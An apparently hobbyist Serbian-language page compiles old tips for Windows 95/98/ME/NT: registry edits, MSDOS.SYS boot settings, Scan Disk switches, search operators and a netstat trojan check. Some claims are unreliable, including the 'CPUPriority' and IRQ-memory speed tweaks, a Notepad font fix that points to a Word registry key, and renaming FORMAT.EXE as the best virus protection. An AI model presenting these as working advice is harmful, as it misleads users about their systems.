Doslo je vreme prvom triku za Windows ME. Kada neki program 'pukne' obicno kliknete na Details u nadi da cete saznati sta je prouzrokovalo pad programa. Medjutim, ljudi iz MSa su se odlucili da ukinu dugme Details iz ko zna kojih razloga, ali kombinacija tastera ALT+D dace vam ono sto ste vec navikli da vidite - detalje.

Kako saznati koliko puta ste startovali neki program ili igru? Dovoljno je samo da pogledate fajl 'OPTLOG.TXT' i sve sto ste dosad startovali videcete upisano i odbrojano. Inace, ovaj fajl koristi MS Scan Disk da bi fajlove koje najcesce koristite stavio na pocetak diska jer ce tada biti brze procitani.

Da li zelite da saznate sta se promenilo u Registry-ju posle instalacije neke aplikacije? Pre nego sto bilo sta pocnete da instalirate startujte Regedit i odaberite opciju 'Export Registry File' i nazovite ga 'pre.reg'. Instalirajte sta ste vec naumili pa ponovo odaberite opciju za Export ali ga ovaj put nazovite 'posle.reg'. Idite na Start/Run i otkucajte"fc pre.reg posle.reg &gt; promene.txt" (sa navodnicima).Stara dobra DOS komanda FC radi i u Windowsu i uporedice ova dva fajla i promene napisati u fajlu 'promene.txt'

Da li su vas ikada nervirali fontovi na nekim web stranama? Negde su isuvise mali, negde su veliki, negde su cudne boje a negde necitljivi. Ukoliko zelite da premostite formatizovanje fontova u IE idite do Internet Options/Accessibility i tamo zavrsite posao.

Interesuje vas sa kojim je sve sajtovima neki sajt linkovan? Otkucajte u Alta Visti npr. 'link:formula1.com' i videcete sve linkove koji poticu sa sajta formula1.com

Kako na internetu pretrazivati URL adrese? Ukoliko vas npr. zanimaju sve web adrese u cijem se URLu pominje rec 'phone' dovoljno je da na Alta Visiti otkucate upit 'url:phone'

Na Unixu vec odavno postoji opcija da kada misem predjete preko neaktivnog prozora on postaje aktivan. Ukoliko to zelite i u Windowsu evo sta treba da uradite. Sa Regeditom idite do HKEY_CURRENT_USER\Control Panel\Mouse, napravite DWORD stavku sa imenom ActiveWindowTracking, dodelite mu vrednost 1 i restartujte

sistem

Evo par switcheva za Scan disk. Moze ti ih koristiti sa npr. Run komandom iz Start menija. 'SCANDSKW /A' ce izvrsiti auto-selekciju vaseg harda, 'SCANDSKW /N' ce poceti scan bez nepotrebnih pitanja, 'SCANDSKW /P' ukljucuje preview mod a 'SCANDSKW /SILENT' ukljucuje silent mod u kojem nemate mogucnost biranja opcija.

Koristite li Telnet u Windowsu? Zelite li Smooth Scrolling. Idite do HKEY_CURRENT_USER \ Software \ Microsoft \ Telnet i promenite vrednost stavke "SmoothScroll" u 1.

Koja je najbolja zastita protiv destruktivnih virusa koji npr. formatizuju hard disk bez znanja korisnika? To nije ni jedan od anti-virusnih programa. Dovoljno je da preimenujete fajl FORMAT.EXE u npr. FORMAT1.EXE. Ovo bi ste takodje mogli primeniti i na fajl FDISK.EXE

Zelite li da promenite prioritet vaseg CPU-a? Idite do HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Services \VxD \ BIOS i u desnom panelu napravite DWORD stavku sa imenom "CPUPriority". Dodelite mu vrednost 1 u decimalnom formatu i rebutujte. Programi i ceo sistem bi trebao da se odaziva brze.

Dok Disk Defragmenter radi svoj posao startovanje Screen Savera nije preporucljivo jer ce posao morati da se radi iz pocetka. Da ne bi ste vrteli misa ukrug za vreme defragmentacije, posegnite za elegantnijem resenju. Sa Regeditom idite do HKEY_CURRENT_USER \ Software \ Microsoft\ Windows \ CurrentVersion \ Applets i napravite novi key "Defrag". Pod njim napravite key "Settings" a unutar njega novi key "DisableScreenSaver" i dodelite mu vrednost "Yes". Sledeci put kada se startuje Defrag, Screen Saver ce biti deaktiviran.

Uz pomoc ovog trika svaki put kada se startuje Windows pojavice se prozor sa proizvoljnim tekstom koji ste vi napisali. Ovo je zgodna stvar ukoliko zelite nesto vazno da napomenete korisnicima racunara ili da im skrenete paznju na nesto. Sa Regeditom idite do HKEY_LOCAL_MACHINE\ SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon i napravite stavku LegalNoticeCaption i ubacite tekst koji zelite.

Imate instaliran Windows 98 i u poslednje vreme radi nestabilno? Ukoliko zelite da vratite Windows 98 u ispravno stanje t.j. stanje koje ste imali kada ste ga prvi put instalirali, uradite sledece. Butujte PC sa Windows 98 Boot diskom, ubacite Windows 98 CD i otkucajte "D:SETUP /Pf" (bez navodnika) ukoliko je D vas CD- ROM. Sa ovom komandom cete Windows 98 vratiti u "factory state" i u 99% slucajeva popraviti sve probleme u sistemu.

Sigurno ste vec sto puta culi o Cookies-ima i o njihovom uticaju na vasu privatnost dok surfujete webom. Standardna je preporuka da ih sa vremena na vreme obrisete, ali time mozete dosta izgubiti na komforu pri surfovanju webom, pogotovo na onim sajtovima koje cesto

posecujete. U IE5 postoji zgodna opcija 'Export Cookies' koja vas moze spasti nevolja. Pre nego sto obrisete Cookie idite na File/ Import Export i izaberite 'Export Cookies' i snimite ga u fajl. Ukoliko nesto ne bude valjalo posle brisanja sa komandom Import mozete sve vratiti u predjasnje stanje.

Korisnici Netscape-a mogu lako da pogledaju sta se desava u njihovom gradu veceras ili sta igra u bioskopu. Dovoljno je samo da otkucaju npr. 'zip 90210' i saznace sta se desava na Beverly Hillsu. Ova opcija za sada radi samo da US podrucje.

Ukoliko imate NT4 i vise od 64MB RAMa postarajte se da vam je stavka DisablePagingExecutive stavljena na 1. Ovim ce sistem iskorisiti svu raspolozivu memoriju. Putanja do ove stavke je HKEY_LOCAL_MACHINE \ System \ CurrentControlSet \ Control \Session Manager \ Memory Management \ DisablePagingExecutive

Ukoliko primetite da vam se sistem ponasa cudno t.j. nestablino, potrazite fajl Bootlog.txt u rutu hard diska. Potrazite stavke 'Fail'. Videcete koji drajveri fale i koji nisu mogli biti ucitani. Njih verovatno posedujete na instalacionom CDu Windowsa pa ih tamo i potrazite i prekopirajte negde u Windowsov 'path'. Primeticete da se stvari rade bolje. Ukoliko nemozete da nadjete fajl Bootlog.txt ubacite u MSDOS.SYS stavku "DISABLELOG=0"

Ukoliko instalirate Internet Explorer sa Windows Desktop update-om moze se dogoditi na vam nestane NEW komanda iz menija koji dobijate kada desnim dugmetom kliknete da desktop. Ovo je klasican MS bug a popravlja se tako sto cete vresnosti u registry bazi vratiti na sledece:Key: [HKEY_CLASSES_ROOT\Directory\Background\ shellex\ ContextMenuHandlers\New]Value Name: (Default)Data Type: REG_SZData: {D969A300-E7FF-11d0-A93B-00A0C90F2719}

Koliko puta ste, surfujuci webom, videli neku jako dobru Macromedia Flash animaciju a niste bili u mogucnosti da je snimite jer takva opcija jednostavno ne postoji? Resenje ovog problema je da dok u browseru gledate Flash animaciju, pomocu Find komande, potrazite *.SWF fajlove i prekopirajte ih u neki drugi folder. Najverovatnije taj fajl necete moci otrvoriti duplim klikom na njega nego cete ga uz pomoc drag&amp;dropa prebaciti u IE a on ce vec uraditi svoj deo posla.

Da li znate da je moguce promeniti kolicinu memorije koju ce koristiti svaki IRQ port pojednicno? Otvorite System.ini fajl u iu sekciji [386enh] dodajte stavku IrqX=4096 gde je X broj IRQ porta. Snimite i rebutujte. Ovim povecavate rezervisanu memoriju za IRQ port i time uvecavate njegove performanse. U praksi se pokazalo da najvece dobitke ostvaruju mrezne kartice, tako da ukoliko je posedujete obavezno ovo uradite.

Uz pomoc ovog trika u meniju koji dobijete kada desnim dugmetom kliknete na bilo koji folder dobicete opciju 'Explore from here' sto ustvari

znaci da ce se kada kliknete na tu opciju otvoriti novi Explorer tog foldera. Idite do KEY_CLASSES_ ROOT\Directory\shell\Explore (ako ne postoji-napravite) i promenite vrednost 'Default' u 'Explore from here'. Napravite novu key pod 'Explore' sa imenom 'command' i editujte Default vrednost u 'explorer.exe /e,/root,/idlist,%i'

Ukoliko ste npr. instalirali Windows na posebnu particiju i ne zelite da se na tu particiju bilo sta upisuje sto nije vezano za sitem pa ni fajlovi Outlook Expressa, evo nacina kako da promenite putanju do foldera gde ce OE upisivati e-mailove i news poruke. Sa Regeditom idite do HKEY_CURRENT_ USER\Software\Microsoft\Outlook Express i u stavku 'Store Root' upisite novu putanju do zeljenog foldera.

Nervira li vas beep iz PC Speakera? Ukoliko zelite da ga iskljucite sa Regeditom idite do HKEY_CURRENT_USER\ Control Panel\Sound i pronadjite stavku Beep. Ukoliko ne postoji napravite je(New/ String Value). Stavci dodelite vrednost No (ili Yes ukoliko se predomislite) i vas Speaker ce po sledecem startovanju Windowsa biti iskljucen.

Da li ste ikada naleteli na neke brojke tipa 404 dok ste surfovali webom? 404 ustvari znaci da sajt nije nadjen, 401 -neovlascen zahtev, 402 -obavestenje da je potrebna uplata, 403 - zabranjen pristup, 408 -time-out zahteva, 500 - greska u serveru(internom), 501 -non-implemented server-side facility, 503- preopterecen server

Ukoliko zelite da kontrolisete kako ce se vas Windows butovati editujte fajl MSDOS.SYS koji se nalazi u rutu. Prvo mu iskljucite Read-Only atribut - ukoliko ne znate kako, ovo nije za vas. U sekciji [Options] postoje sledece stavke a vrednost '1' znaci DA a '0' znaci NE. BootGUI=1 (boot into Windows); DblSpace=0 (load DoubleSpace drivers); DrvSpace=0 (load DriveSpace drivers); LoadTop=1 (loadcommand shell in upper memory); BootMenu=1 (turn on boot menu-preporucljivo); BootMenuDefault=1 (choice in boot menu); BootMenuDelay=2 (seconds to delay boot menu); BootKeys=1 (keyboard shortcuts for more booting options); Logo=1 (see the Windows splash screen); AutoScan=0 (automatically scandisk after a 'bad' shutdown); BootWarn=0 (warning about going into Safe mode); DisableLog=0 (boot up logging

Windows 2000 dolazi sa novim instalerom zvanim 'Microsoft Windows Installer'. Buduce instalacije dolazice u novom formatu .MSI pa ukoliko zelite da otvorite ovakav fajl moracete ovo instalirati. Microsoft je novi instaler preuredio za Windows 95, 98, NT pa ga slobodno mozete preuzeti sa:www.microsoft.com/msdownload/platformsdk/instmsi.htm

U Windowsu 98 se desava da se CD ne startuje automatski po ubacivanju u drajv. Ovaj bag se resava tako sto cete u registriju otici do [HKEY_CURRENT_USER\Software\ Microsoft\ Windows\CurrentVersion\Policies\Explorer] i napraviti novu stavku sa imenom NoDriveTypeAutoRun sa vrednoscu 0000 95 00 00 00

Smetaju vam neke ikone u Control Panelu i zeleli bi da ih se otarasite. Nista lakse! Trazite fajlove sa ekstenzijom *.CPL. Ove fajlove mozete skloniti iz System foldera ali budite oprezni - neki su zaista neophodni. Sigurniji nacin je da u Control.ini fajlu u sekciji [don't load] upisete koje fajlove Windows ne treba da ucita. Npr. ukoliko ne zelite da vam se ucita Quick Time aplet za Control Panel onda cete u pomenutoj sekciji upisati "quicktime.cpl=no" (bez navodnika)

Koji je najbrzi nacin kreiranja shortcuta? Ne znam, ali ovaj sigurno treba uzeti u obzir. Dok ste u Win Exploreru odvucite ikonu iz gornjeg levog ugla na desktop i dobicete shortcut za folder u kojem ste se nalazili. Ovo isto mozete koristiti i u IE da bi na najlaksi nacin dobili shortcut na desktopu za odredjeni URL.

Prilikom kopiranja programa sa CD-a moze se dogoditi da program odbija da radi. Ukoliko ste sigurni da je CD dobro snimljen onda jedini problem moze biti u tome sto su prekopirani fajlovi u READ ONLY modu. Oznacite sve fajlove i u Properties iskljucite Read Only.

Imate malo mesta na hard disku i zelite da napravite malo mesta? Ukoliko zelite instant 7 MB vise na vasem hardu idite do foldera C:\Windows\Help i obrisite sve AVI fajlove jer oni predstavljaju tutorial Windowsa a predpostavljam da vam to vise ne treba.

Kako da ogranicite pretragu na Altavisti na samo jedan domen? Ukoliko npr. zelite da pretrazite rec MP3 samo u "yu" domenu korisitite sledecu sintaksu "host:.yu mp3".

Jedan od glavnih uzroka pada sistema je koriscenje starih 16. bitnih programa. Kako da na najbrzi nacin saznate da li je program 16. ili 32. bitan? Otvorite EXE fajl programa u Quick View-u i informacije o njemu su pred vama. Ako je program 16. bitan pokusajte da pronadjete noviju verziju, update ili cak njegovu 32. bitnu verziju.

Jedan od najlaksih provera sistema na viruse trojance je da u DOS Prompt-u otkucate "netstat -a" (bez navodnika). Ova komanda ce vam dati prikaz svih otvorenih portova. Treba je startovati dok racunar nije povezan na internet i proveriti da li postoji neki otvoreni port koji ima status "Listening". Ako je broj porta ispod 1024, velika je verovatnoca da se radi o nekom sistemskom servisu. Medutim, ako je broj iznad 1024 proverite sistem sa nekim anti-virusnim programom.

Kolega na poslu predugo drzi rekord u Minesweeperu? Rekord bi veoma lako oborili samo da nema tog prokletog sata, zar ne? Da bi zaustavili sat kliknite bilo gde na tablu da bi pocelo da tece vreme. Pritisnite zajedno levo i desno dugme misa i taster ESCAPE i do kraja radnog vremena rekord ce biti vas! :)

Znate li Easter Egg Helpa Windowsa 95? Idite na Start/ Help i izaberite Find. Ukoliko dosad niste napravili index bazu napravite je. Pod Options treba da vam bude ukljuceno "All the words you typed in any order" i "begin with the characters you type" a ostalo nije bitno. Kliknite na OK.

Pod Find otkucajte "Who knows who built this tool?" (bez navodnika sa velikim W) i drzite SHIFT i CTRL pa kliknite na Clear. Opet idite pod Options ali ovaj put stavite "At least one of the words you typed" i "contain the characters you type". Kliknite na OK pa otkucajte "The Shadow knows!" (bez navodnika sa velikim T i S). Drzite SHIFT i CTRL pa opet Clear i Easter Egg je tu!

Koristite li BCC kada saljete e-mail na vise korisnika? Koriscenjem BCCa (Blind Carbon Copy) mozete poslati isti email na vise e-mail adresa a da pritom oni koji su dobili taj e-mail ne znaju kome ste jos poslali. Koliko postujete privatnost drugih toliko ce i drugi postovati vasu.

Verovatno ste primetili da svaki put kada editujete DOC fajl u Wordu97/2K oni budu veci bez obzira koliko brisali unutar njega. Ova pojava se desava zbog opcije Auto Save, koju treba iskljuciti, a da bi DOC fajlove sveli na razumne duzine otvorite ih pa ih snimite sa Save As. Primeticete da su fajlovi dosta manji.

Zelite da editujete sistemske ini fajlove? Uvek je dobro imati ih sve zajedno otvorene zbog bolje preglednosti. Za tu svrhu najbolje ce vam posluziti program Sysedit (windows\system\ sysedit.exe) koji automatski otvara Autoexec.bat, Config.sys, Win.ini, System.ini i Protocol.ini pa tako editovanje postaje znatno lakse.

Dok ste citali postu u Outlook Expressu pukao vam je sistem ili mozda nestala struja? Po sledecom startovanju sistema startovace vam se Scan Disk i naci ce gresku u Outlook-ovom history fajlu. Popravite ga. Kada budete startovali OE, poruku koju ste citali necete moci da vidite zbog toga sto OE nije bio propisno ugasen. Ali ovo ne treba da vas plasi jer poruka je jos uvek tu. Dovoljno je samo da klikete na bilo koji drugi e-mail pa posle toga ponovo na problematicni i sada nece biti problema.

Desilo vam se da u browseru dobijete potpuno drugu web stranicu od zahtevane? E pa doslo je vreme da pocistite Cache t.j. Temporary Internet fajlove jer je vas omiljni browser pocelo pomalo da brlja.

Kako na najbrzi nacin startovati Windows Explorer? Ukoliko imate Windows tastaturu pritisnite Winkey + E i to je to!

Ukoliko radite sa Windows Explorerom verovatno ste primetili da ukoliko pokusate da upravo snimljeni fajl na disketu presnimite na hard disk radi provere(posto su diskete prilicno nepouzdane), sistem ga nece uopste citati sa diskete nego ce ga direktno iz buffera presnimiti na hard. Da bi pocistili buffer flopi diska jednostavno izbacite i ubacite diksetu u flopi i tek ce sada fajl sa diskete biti procitan i presnimljen na hard.

Nervira li vas onaj ruzni font u Notepadu? Ukoliko zelite da ga promenite moracete da cepkate malo po registry-ju. Idite do: HKEY_CURRENT_USER\Software\Microsoft\Office\ 8.0\ Word\Options i promenite "fixedfon.fon" u novi font.Napomena: TrueType(.TTF) fontovi nisu podrzani

Ako ste jedan od mnogobrojnih koji su potpuno zapostavili svoju numericku tastaturu (da, to su oni tasteri sa strane gde se uhvatila paucina) evo nacina kako da ih najbolje iskorisite u Windowsu. Svaka ikona na desktopu moze imati svoju precicu (shortcut) preko tastature t.j. hot key. Da bi ste konfigurisali "vruce tastere" kliknite desnim dugmetom na desktop ikonu i izaberite Properties/ Shortcut. Na Shortcut Key kliknite jedanput i potom pritisnite taster(sa numericke tastature) koji ce ubuduce biti precica sa startovanje tog programa.

Kako startovati IE bez ikakvih ikona, tool i status barova?Start/ RUN/ i otkucajte "iexplore -k http://www.domain.com/"

Da bi ste brze resetovali masinu (Start/Shutdown/Restart) drzite SHIFT taster pre nego sto kliknete na OK

Ukoliko necete da vam se automatski startuje CD, drzite SHIFT taster pri ubacivanju CD-a.

Auto search opcija u Internet Exploreru je sjajna stvar ali samo za domene .com, .edu, ili .org . Dodajte sami jos neke domene, kao sto su .net ili jos bolje .co.yu tako sto cete sa Regeditom otici na HKEY_LOCAL_MACHINE &gt; SOFTWARE &gt; Microsoft &gt; Internet Explorer &gt; Main &gt; UrlTemplate i tamo uneti ono sto vam treba

Kada trazite fajlove sa Windows Find (Start/Find) obelezite neki fajl od pronadjenih i preko File menija potrazite opciju 'Open Containing Folder'. Ukoliko upotrebite ovu opciju naci cete se u folderu gde je fajl, koji ste trazili, pronadjen!

Ukoliko vam cesto "puca" veza sa vasim provajderom pokusajte da uradite sledece. Idite na Control Panel\ Modems\ Properties\ Connection i na kraju Advanced i pod Extra settings otkucajte "S10=50" (bez navodnika). Ovo bi trebalo da "ojaca" izdrzljivost modema. Ukoliko imate vise unosa pod Extra Settings razdvojte ih razmakom

To je vecina trikova koji postoje u windowsima, ali ima njih jos puno koji su ostali ne istrazeni ali i oni ce uskoro biti na ovim stranicama....uskoro ocekujte nastavak ovih trikova naravno dok odmorim malkice prste.

P.S. Htio bih da napomenem da ovo nisu sve moji trikovi oni su skidani sa svih strana pomalo...

------------------------------------------------------------------